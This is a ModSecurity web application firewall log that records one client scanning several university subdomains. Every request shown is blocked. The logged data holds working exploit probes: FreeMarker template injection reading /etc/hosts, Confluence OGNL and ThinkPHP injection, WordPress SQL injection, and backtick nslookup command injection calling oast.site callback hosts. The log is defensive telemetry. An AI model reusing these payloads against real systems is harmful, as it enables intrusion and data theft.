"pusatbahasa.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10vsCo-f0AAAQMrygAAAAu"]
[Tue Aug 29 11:31:58.365571 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10vsCo-f0AAAQR4@EAAAAz"]
[Tue Aug 29 11:31:58.368453 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10vsCo-f0AAAPDoAoAAAAP"]
[Tue Aug 29 11:31:58.375398 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10vsCo-f0AAAP8G2sAAAAV"]
[Tue Aug 29 11:31:58.396672 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10vsCo-f0AAAQNwLYAAAAv"]
[Tue Aug 29 11:31:58.398905 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10vsCo-f0AAAQJWzUAAAAr"]
[Tue Aug 29 11:31:58.417470 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAQNwLcAAAAv"]
[Tue Aug 29 11:31:58.420157 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vsCo-f0AAAPDoAwAAAAP"]
[Tue Aug 29 11:31:58.429070 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10vsCo-f0AAAQnF68AAAAF"]
[Tue Aug 29 11:31:59.317219 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlgj7e13oakp7ro5.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAQNwLgAAAAv"]
[Tue Aug 29 11:31:59.317566 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10v8Co-f0AAAQMrysAAAAu"]
[Tue Aug 29 11:31:59.318798 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlg4nb1nqsh6i1cc.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAP6NRsAAAAQ"]
[Tue Aug 29 11:31:59.321689 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlg3keb6ufj3i7ua.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAPiBocAAAAB"]
[Tue Aug 29 11:31:59.325432 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlg8m9phmfmhejzb.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAP8G20AAAAV"]
[Tue Aug 29 11:31:59.328924 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlgx9fgnihchycjs.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAN9sRoAAAAJ"]
[Tue Aug 29 11:31:59.344177 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10v8Co-f0AAAQSWP0AAAA0"]
[Tue Aug 29 11:31:59.349233 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10v8Co-f0AAAP5mNcAAAAM"]
[Tue Aug 29 11:31:59.353618 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10v8Co-f0AAAQR4@YAAAAz"]
[Tue Aug 29 11:31:59.394132 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10v8Co-f0AAAQMrywAAAAu"]
[Tue Aug 29 11:32:00.308863 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlg5joa1fn9zzhs1.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10wMCo-f0AAAPDoA8AAAAP"]
[Tue Aug 29 11:32:00.321051 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10wMCo-f0AAAPiBokAAAAB"]
[Tue Aug 29 11:32:01.309728 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10wcCo-f0AAAPDoBYAAAAP"]
[Tue Aug 29 11:32:02.595512 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10wsCo-f0AAAQ7NEwAAAAH"]
[Tue Aug 29 11:32:03.411809 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10w8Co-f0AAAQ9Hz0AAAAK"]
[Tue Aug 29 11:32:04.358786 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10xMCo-f0AAAQOv6MAAAAw"]
[Tue Aug 29 11:32:04.360878 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAP5mNoAAAAM"]
[Tue Aug 29 11:32:04.409529 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQR4@kAAAAz"]
[Tue Aug 29 11:32:04.415048 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQUIBEAAAA2"]
[Tue Aug 29 11:32:04.415912 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAPiBpMAAAAB"]
[Tue Aug 29 11:32:04.483970 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQnF7UAAAAF"]
[Tue Aug 29 11:32:04.494158 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10xMCo-f0AAANsAYAAAAAD"]
[Tue Aug 29 11:32:04.515767 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQV4SoAAAA3"]
